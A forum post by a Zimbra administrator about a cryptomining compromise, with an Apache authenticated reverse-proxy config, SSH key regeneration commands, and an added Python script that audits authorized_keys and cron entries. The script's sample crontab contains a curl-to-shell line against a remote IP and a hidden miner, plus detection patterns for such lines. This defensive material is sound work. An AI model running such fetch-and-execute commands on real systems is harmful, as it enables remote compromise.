> if you have a vulnerable zimbra installation you're vulnerable, you cannot add mitigation (probably only a WAF could do something).

I'm not advocating not patching, but the following will work. I'm going with my default position of not trusting authentication mechanisms of hosted apps, so I set up an HTTP proxy with authentication. HTTP/HTTPS and 7071 (admin port) are closed, and only available through the proxy. The best candidate server I had runs Apache, so I made it in Apache:
```apache
# Port 80: redirect everything to HTTPS
<VirtualHost *:80>
    RewriteEngine on
    RewriteRule ^/(.*) https://%{HTTP_HOST}/$1 [L,R]
    ServerName webmail.example.net
</VirtualHost>

<VirtualHost *:443>
    ServerName webmail.example.net
    ServerAdmin webmaster@localhost

    SSLEngine on
    SSLCertificateFile /etc/letsencrypt/live/webmail.example.net/cert.pem
    SSLCertificateKeyFile /etc/letsencrypt/live/webmail.example.net/privkey.pem
    SSLCertificateChainFile /etc/letsencrypt/live/webmail.example.net/chain.pem

    # Reverse proxy to the Zimbra host over TLS
    SSLProxyEngine On
    ProxyPass / https://mail.example.net/
    ProxyPassReverse / https://mail.example.net/

    # Paths exempted from the proxy's Basic auth (client-facing endpoints)
    <Location /dav>
        Satisfy any
        Require all granted
    </Location>
    <Location /.well-known/>
        Satisfy any
        Require all granted
    </Location>
    <Location /principals/>
        Satisfy any
        Require all granted
    </Location>
    <Location /SOGo/>
        Satisfy any
        Require all granted
    </Location>
    <Location /groupdav.php>
        Satisfy any
        Require all granted
    </Location>

    # Everything else requires a proxy login before reaching Zimbra
    <Location />
        AuthType Basic
        AuthName "Foobar"
        AuthUserFile /etc/apache2/htpasswd/webmail
        Require valid-user
    </Location>

    ErrorLog ${APACHE_LOG_DIR}/webmail.example.net/error.log
    CustomLog ${APACHE_LOG_DIR}/webmail.example.net/access.log combined
</VirtualHost>
```
BTW: one should also run:
```sh
su - zimbra
# regenerate the zimbra user's SSH keypair ...
zmsshkeygen
# ... and push the new public key into authorized_keys on all Zimbra hosts
zmupdateauthkeys
```
All in all, I can't shake how polite this hack is. It's almost a smoke screen. With the zimbra user, you have access to everything, potentially: install authorized_keys, crontabs in spools, upload all mail from the server. You can even falsify the access logs, because they're also owned by zimbra. Yet all that is done is mine Bitcoin? A severely inefficient process (1000 servers is about one ASIC miner). And, the access logs on my server started seeing these POSTs March 28, and it was only yesterday that the mining started...
Because of a daily backup of dumped accounts, I see a very steady rhythm of network traffic. There is no extra peak, so it appears my entire e-mail archive wasn't downloaded. But, they could have...
Next up, find out why the update notifier doesn't work. '/opt/zimbra/libexec/zmcheckversion -c' is called by cron, but just says 'Too early' when I run it from the command line.
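The post lists the persistence points a compromised zimbra user can reach (authorized_keys, the cron spool). The following is an added example, not the poster's code and not a Zimbra tool: a small Python audit of those two files with constructed sample data embedded inline. The allowlisted key blob, the cron spool path /var/spool/cron/zimbra and the "suspicious" cron heuristics (temp-dir binaries, curl/wget piped to a shell, base64 decoding) are assumptions for illustration; on a real host you would feed it the actual files and your own key inventory.

```python
"""Added example (not from the forum post or from Zimbra): audit the two
persistence points the post mentions for the 'zimbra' user, its
authorized_keys file and its cron spool. All sample data is constructed."""
import re

# Constructed sample standing in for /opt/zimbra/.ssh/authorized_keys.
SAMPLE_AUTHORIZED_KEYS = """\
# cluster key regenerated with zmsshkeygen / zmupdateauthkeys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClusterKeyBlobPlaceholder zimbra@mail.example.net
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIUnknownKeyBlobPlaceholder
command="sh /tmp/.x/run.sh" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCForcedCmdBlobPlaceholder unknown
"""

# Assumption: the blobs you expect come from your own key inventory
# (e.g. what zmupdateauthkeys installed on a known-clean host).
ALLOWED_KEY_BLOBS = {"AAAAB3NzaC1yc2EAAAADAQABAAABAQClusterKeyBlobPlaceholder"}

# Constructed sample standing in for /var/spool/cron/zimbra (path is an assumption).
SAMPLE_CRONTAB = """\
# entries normally written by Zimbra (constructed, not the real zimbra crontab)
30 0 * * * /opt/zimbra/libexec/zmcheckversion -c > /dev/null 2>&1
0 2 * * * /opt/zimbra/bin/zmbackup -f -a all > /dev/null 2>&1
*/5 * * * * curl -s http://203.0.113.5/x.sh | sh
@reboot /dev/shm/.hidden/miner
"""

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521", "ssh-dss")
# options (may contain quoted spaces), key type, base64 blob, optional comment
KEY_RE = re.compile(r"(?:^|\s)(" + "|".join(map(re.escape, KEY_TYPES)) +
                    r")\s+(\S+)(?:\s+(.*))?$")


def parse_authorized_keys(text):
    """Split each authorized_keys entry into options, key type, blob and comment."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_RE.search(line)
        if not m:
            entries.append({"line": lineno, "malformed": True, "options": line,
                            "type": None, "blob": None, "comment": ""})
            continue
        entries.append({"line": lineno, "malformed": False,
                        "options": line[:m.start()].strip(),
                        "type": m.group(1), "blob": m.group(2),
                        "comment": (m.group(3) or "").strip()})
    return entries


def unexpected_keys(text, allowed_blobs):
    """Return (line number, reason) for every key entry that needs a human look."""
    findings = []
    for e in parse_authorized_keys(text):
        reasons = []
        if e["malformed"]:
            reasons.append("unparseable entry")
        elif e["blob"] not in allowed_blobs:
            reasons.append("key not in allowlist")
        if "command=" in e["options"]:
            reasons.append("forced command")
        if reasons:
            findings.append((e["line"], ", ".join(reasons)))
    return findings


# Generic heuristics (assumptions for this example, not indicators from the post).
SUSPICIOUS_CRON = [
    (re.compile(r"(?:^|\s)/(?:tmp|var/tmp|dev/shm)/"), "runs from a world-writable temp dir"),
    (re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"), "downloads and pipes to a shell"),
    (re.compile(r"base64\s+(?:-d|--decode)\b"), "decodes an embedded payload"),
]


def cron_command(line):
    """Return the command part of a crontab line (after 5 time fields or an @keyword)."""
    n = 1 if line.startswith("@") else 5
    fields = line.split(None, n)
    return fields[n] if len(fields) > n else ""


def suspicious_cron_lines(text, trusted_prefixes=("/opt/zimbra/",)):
    """Return (line number, reason) for entries outside the trusted tree or
    matching one of the heuristics above."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = [why for pat, why in SUSPICIOUS_CRON if pat.search(line)]
        if not cron_command(line).startswith(trusted_prefixes):
            reasons.append("command outside trusted prefixes")
        if reasons:
            findings.append((lineno, ", ".join(reasons)))
    return findings


def audit(authorized_keys_text, crontab_text, allowed_blobs):
    """Combine both checks; empty lists mean nothing stood out."""
    return {"authorized_keys": unexpected_keys(authorized_keys_text, allowed_blobs),
            "crontab": suspicious_cron_lines(crontab_text)}


if __name__ == "__main__":
    for source, findings in audit(SAMPLE_AUTHORIZED_KEYS, SAMPLE_CRONTAB,
                                  ALLOWED_KEY_BLOBS).items():
        for lineno, reason in findings:
            print(f"{source}:{lineno}: {reason}")
```

Run as-is it reports the unknown ed25519 key, the forced-command key, the curl-to-shell entry and the /dev/shm binary, and stays quiet about the two /opt/zimbra entries. Because the post notes the zimbra user can also rewrite its own logs and files, treat the output as a starting point for a look from outside the host (backups, a trusted key inventory), not as proof of a clean system.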